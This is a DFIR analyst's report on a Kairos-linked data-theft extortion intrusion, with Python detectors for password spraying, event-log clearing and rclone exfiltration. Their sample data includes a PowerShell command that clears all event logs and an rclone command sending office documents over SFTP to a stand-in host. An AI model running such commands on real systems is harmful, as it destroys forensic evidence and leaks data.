Prepared by: Mike Varley, DFIR Analyst | Last update: 18 February 2026
In early 2025, reports emerged of an Australian hospitality group confirming a cyber incident linked to the Kairos ransomware operation. Unlike traditional ransomware attacks that encrypt systems and demand payment for decryption keys, Kairos is part of a growing wave of threat actors who focus on stealing sensitive information and using it as leverage.
Triskele Labs investigated a Kairos-linked intrusion in 2024, gaining direct visibility into how the group operates. The findings offer a clear reminder that modern extortion tactics are often quiet, targeted, and designed to apply pressure without disrupting business operations.
In the case investigated by Triskele Labs, the attacker gained access through an externally exposed Remote Desktop Gateway. A generic user account was compromised, with the password assessed as vulnerable to password spraying. There was no multi-factor authentication (MFA) in place, and access was not restricted through a VPN. In practical terms, the door was left unlocked. Once valid credentials were obtained, the attacker was able to log in directly without triggering strong security barriers.
This method reflects a broader trend: attackers are increasingly exploiting exposed services and weak authentication controls rather than relying on complex technical exploits.
After gaining access, the attacker attempted to strengthen their position by harvesting credentials and exploring the internal environment. Tools commonly used in post-compromise activity were deployed to attempt privilege escalation and internal movement.
While lateral movement attempts were made using Remote Desktop, SMB and PowerShell, no successful widespread movement was observed in this instance.
However, internal password spraying activity continued, indicating an effort to expand access.
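As an added illustration (not part of the Triskele Labs report or its tooling), the following Python flags the pattern behind both the external and the internal spraying described above: one source failing logons against many distinct accounts inside a short window. The records are constructed and mirror Windows Security Event ID 4625 fields as a SIEM would normalise them.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon records (Windows Security Event ID 4625) as a SIEM
# might normalise them; not data from the incident. The same logic applies to
# 4771 (Kerberos pre-auth failed) and 4776 (NTLM validation) on domain controllers.
SAMPLE_EVENTS = [
    # one external source tries six different accounts, one attempt each
    *({"ts": f"2024-06-01T02:1{i}:00", "id": 4625, "src_ip": "203.0.113.10", "user": u}
      for i, u in enumerate(["reception", "frontdesk", "events", "finance", "kitchen", "bar"])),
    # one source hammers a single account: brute force, not a spray
    *({"ts": f"2024-06-01T02:0{i}:30", "id": 4625, "src_ip": "198.51.100.7", "user": "admin"}
      for i in range(8)),
    # a genuine user mistyping a password twice
    {"ts": "2024-06-01T09:00:00", "id": 4625, "src_ip": "10.0.0.5", "user": "jsmith"},
    {"ts": "2024-06-01T09:00:20", "id": 4625, "src_ip": "10.0.0.5", "user": "jsmith"},
]


def detect_password_spray(events, window=timedelta(minutes=30), min_accounts=5):
    """Flag each source IP that failed logons against at least `min_accounts`
    distinct accounts within any `window`-long span. Counting distinct accounts
    per source, rather than failures per account, separates a spray from a
    brute-force run on one account or a user mistyping a password; the low
    per-account count is also why a lockout policy alone does not catch it."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            by_src[e["src_ip"]].append((datetime.fromisoformat(e["ts"]), e["user"]))
    findings = []
    for src_ip, attempts in by_src.items():
        attempts.sort()
        best, j = None, 0
        for i, (start, _) in enumerate(attempts):
            # slide the window end forward; j only ever moves right
            while j < len(attempts) and attempts[j][0] - start <= window:
                j += 1
            users = {u for _, u in attempts[i:j]}
            if len(users) >= min_accounts and (best is None or len(users) > len(best["accounts"])):
                best = {"src_ip": src_ip, "first_seen": start.isoformat(),
                        "last_seen": attempts[j - 1][0].isoformat(), "accounts": sorted(users)}
        if best:
            findings.append(best)
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(SAMPLE_EVENTS):
        print(f"{f['src_ip']}: {len(f['accounts'])} accounts {f['first_seen']}..{f['last_seen']}")
```

Tune `min_accounts` and `window` to the size of the user base: a small site with a handful of staff accounts needs a lower threshold than a large domain.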
Importantly, the attacker also cleared Windows Event Logs to reduce visibility and complicate forensic investigation. This step is a common tactic designed to delay detection and limit evidence.
The defining feature of Kairos’ approach is what they do not do.
There was no encryption deployed, systems were not locked and operations were not deliberately disrupted.
Instead, the attacker staged and exfiltrated selected data using a legitimate file transfer tool (RClone), transferring it via SFTP to an overseas hosting provider. The data targeted was specific: PDFs, Word documents and other common business document formats, rather than a wholesale extraction of all available data.
This precision suggests a deliberate strategy. By avoiding operational damage, attackers reduce immediate detection and position themselves to apply pressure later through extortion threats.
Rather than deploying ransomware, Kairos used internal communications as a pressure tactic. Emails were sent from a compromised account via Outlook to notify staff of the breach and data theft. There were also attempts to make contact by telephone. This tactic serves multiple purposes: it creates internal panic and uncertainty, accelerates executive awareness and pressures organisations to respond quickly.
The threat is not system downtime; it is reputational damage and public data exposure. This is known as a single-extortion model, where the leverage lies entirely in the stolen data.
Kairos demonstrates a shift in how extortion operations are conducted:
- Reliance on valid credentials rather than noisy exploits
- Use of legitimate remote access services
- Focused data exfiltration rather than mass encryption
- Psychological manipulation through direct communication
These operations are not necessarily loud or destructive. In fact, the lack of disruption can delay detection and increase the strategic impact of the breach.
The intrusion investigated by Triskele Labs highlights several practical controls that materially reduce risk.
Most importantly, organisations should recognise that ransomware is no longer defined by encryption alone. Data theft and extortion now sit at the centre of many modern attacks.
The Kairos model reinforces a clear message: attackers do not need to shut down your business to cause serious harm. Quiet access, selective data theft, and calculated pressure can be just as damaging.
The following technical observations were identified during the Triskele Labs investigation of a Kairos-linked intrusion:
These details are aligned to the MITRE ATT&CK framework to support security and detection teams.
The attacker did not exploit software vulnerabilities; instead, they leveraged weak authentication controls.
Rubeus (Kerberos interaction and ticket manipulation tool)
This phase focused on expanding privileges to enable broader access across the domain.
While large-scale lateral movement was not confirmed in this case, the techniques are consistent with domain-wide expansion attempts.
Clearing Windows Event Logs via PowerShell
Log clearing is a deliberate attempt to reduce forensic visibility and delay detection.
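As an added example (not the report's own detection content), the following Python shows the defender-side view of the log clearing described above: the clear leaves Event ID 1102 in the freshly emptied Security log and Event ID 104 in the System log for other channels, and where PowerShell script block logging is enabled, Event ID 4104 records the command that did it. Host, account and timestamps are constructed.

```python
import re
from datetime import datetime

# Pattern for the two usual ways of clearing a channel from PowerShell
CLEAR_CMD_RE = re.compile(r"\b(?:Clear-EventLog|wevtutil(?:\.exe)?\s+(?:cl|clear-log))\b", re.I)

# Constructed records as a SIEM might normalise them; host, account and times
# are made up for this example and are not from the incident.
SAMPLE_EVENTS = [
    {"ts": "2024-06-02T03:40:10", "host": "RDGW01", "user": "HOTEL\\svc_generic",
     "channel": "Microsoft-Windows-PowerShell/Operational", "id": 4104,
     "script": "Get-EventLog -List | ForEach-Object { Clear-EventLog -LogName $_.Log }"},
    # 1102 is the first record written to the emptied Security log
    {"ts": "2024-06-02T03:40:11", "host": "RDGW01", "user": "HOTEL\\svc_generic",
     "channel": "Security", "id": 1102},
    # 104 goes to the System log and names the channel that was cleared
    {"ts": "2024-06-02T03:40:11", "host": "RDGW01", "user": "HOTEL\\svc_generic",
     "channel": "System", "id": 104, "cleared_channel": "Application"},
    {"ts": "2024-06-02T08:00:00", "host": "FS01", "user": "HOTEL\\jsmith",
     "channel": "Security", "id": 4624},
]


def detect_log_clearing(events, correlate_seconds=300):
    """Return one finding per log-clear event (1102 in Security, 104 in System),
    naming the account that cleared it and any PowerShell script block (4104) on
    the same host within `correlate_seconds` that carried a clearing command."""
    parse = datetime.fromisoformat
    scripts = [e for e in events
               if e["id"] == 4104 and CLEAR_CMD_RE.search(e.get("script", ""))]
    findings = []
    for e in events:
        if e["id"] == 1102 and e["channel"] == "Security":
            cleared = "Security"
        elif e["id"] == 104 and e["channel"] == "System":
            cleared = e.get("cleared_channel", "<unknown>")
        else:
            continue
        commands = [s["script"] for s in scripts if s["host"] == e["host"]
                    and abs((parse(e["ts"]) - parse(s["ts"])).total_seconds()) <= correlate_seconds]
        findings.append({"host": e["host"], "user": e["user"],
                         "cleared": cleared, "commands": commands})
    return findings
```

This only tells you that a clear happened and who did it; the records that were wiped are recoverable only if the Security and System channels were already being forwarded to a collector.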
The use of legitimate tooling and alternative protocols reduces the likelihood of detection where outbound traffic monitoring is limited.
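The following Python, added here and not drawn from the investigation, classifies process-creation records (Sysmon Event ID 1 or Security 4688 fields, normalised) for rclone use of the kind described above, including the renamed-binary case where only the PE's original filename gives it away. Hosts, users and the remote address are constructed.

```python
import re
import shlex

# Constructed process-creation records (fields as Sysmon Event ID 1 / Security
# 4688 would provide them after normalisation); hosts, users and the remote
# address are made up for this example.
SAMPLE_EVENTS = [
    {"user": "HOTEL\\svc_generic", "image": r"C:\Users\Public\svchost.exe",
     "original_file_name": "rclone.exe",   # the PE version resource still says rclone
     "command_line": r'"C:\Users\Public\svchost.exe" copy C:\Staging '
                     r':sftp,host=198.51.100.20,user=up:/in --include *.pdf '
                     r'--include *.docx --transfers 8'},
    {"user": "HOTEL\\jsmith", "image": r"C:\Windows\System32\notepad.exe",
     "original_file_name": "NOTEPAD.EXE",
     "command_line": r"notepad.exe C:\Users\jsmith\menu.txt"},
]

RCLONE_VERBS = {"copy", "copyto", "sync", "move", "moveto", "ls", "lsd", "lsf"}
# "remote:path" with a 2+ character remote name (so C:\ does not match), or a
# ":backend,opt=val:path" connection string such as ":sftp,host=...:/in"
REMOTE_RE = re.compile(r"^(?::[\w-]+(?:,[^:]+)?|[\w-]{2,}):")
DOC_EXT_RE = re.compile(r"\*\.(?:pdf|docx?|xlsx?|pptx?)$", re.I)


def classify_process_event(ev):
    """Return the reasons `ev` looks like rclone data transfer, or [] if none."""
    reasons = []
    if ev.get("original_file_name", "").lower() == "rclone.exe":
        reasons.append("PE original filename is rclone.exe")  # survives renaming
    if ev["image"].lower().endswith("\\rclone.exe"):
        reasons.append("image is rclone.exe")
    argv = shlex.split(ev["command_line"], posix=False)  # keep Windows backslashes
    verb = argv[1].lower() if len(argv) > 1 else ""
    remotes = [a for a in argv[2:] if REMOTE_RE.match(a)]
    if verb in RCLONE_VERBS and remotes:
        reasons.append(f"rclone-style '{verb}' to remote {remotes[0]}")
    if any("sftp" in a.lower() for a in argv[1:]):
        reasons.append("SFTP backend referenced")
    docs = [a for a in argv if DOC_EXT_RE.search(a)]
    if docs:
        reasons.append("filters select office documents: " + ", ".join(docs))
    return reasons


def scan(events):
    """Return one finding per event that produced at least one reason."""
    return [{"user": e["user"], "image": e["image"], "reasons": r}
            for e in events if (r := classify_process_event(e))]
```

Legitimate backup jobs that use rclone will match as well; allowlist them by image path and account rather than by command line, and pair this with egress monitoring for TCP/22 from hosts that have no business using SFTP.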
Rather than encrypting systems, Kairos relies on data theft and psychological pressure to compel payment — a deliberate single-extortion model.
This mapping reinforces that Kairos does not rely on novel exploits. Instead, the group combines valid credentials, legitimate administrative tooling, and established ATT&CK techniques in a disciplined and controlled manner designed to minimise noise while maximising leverage.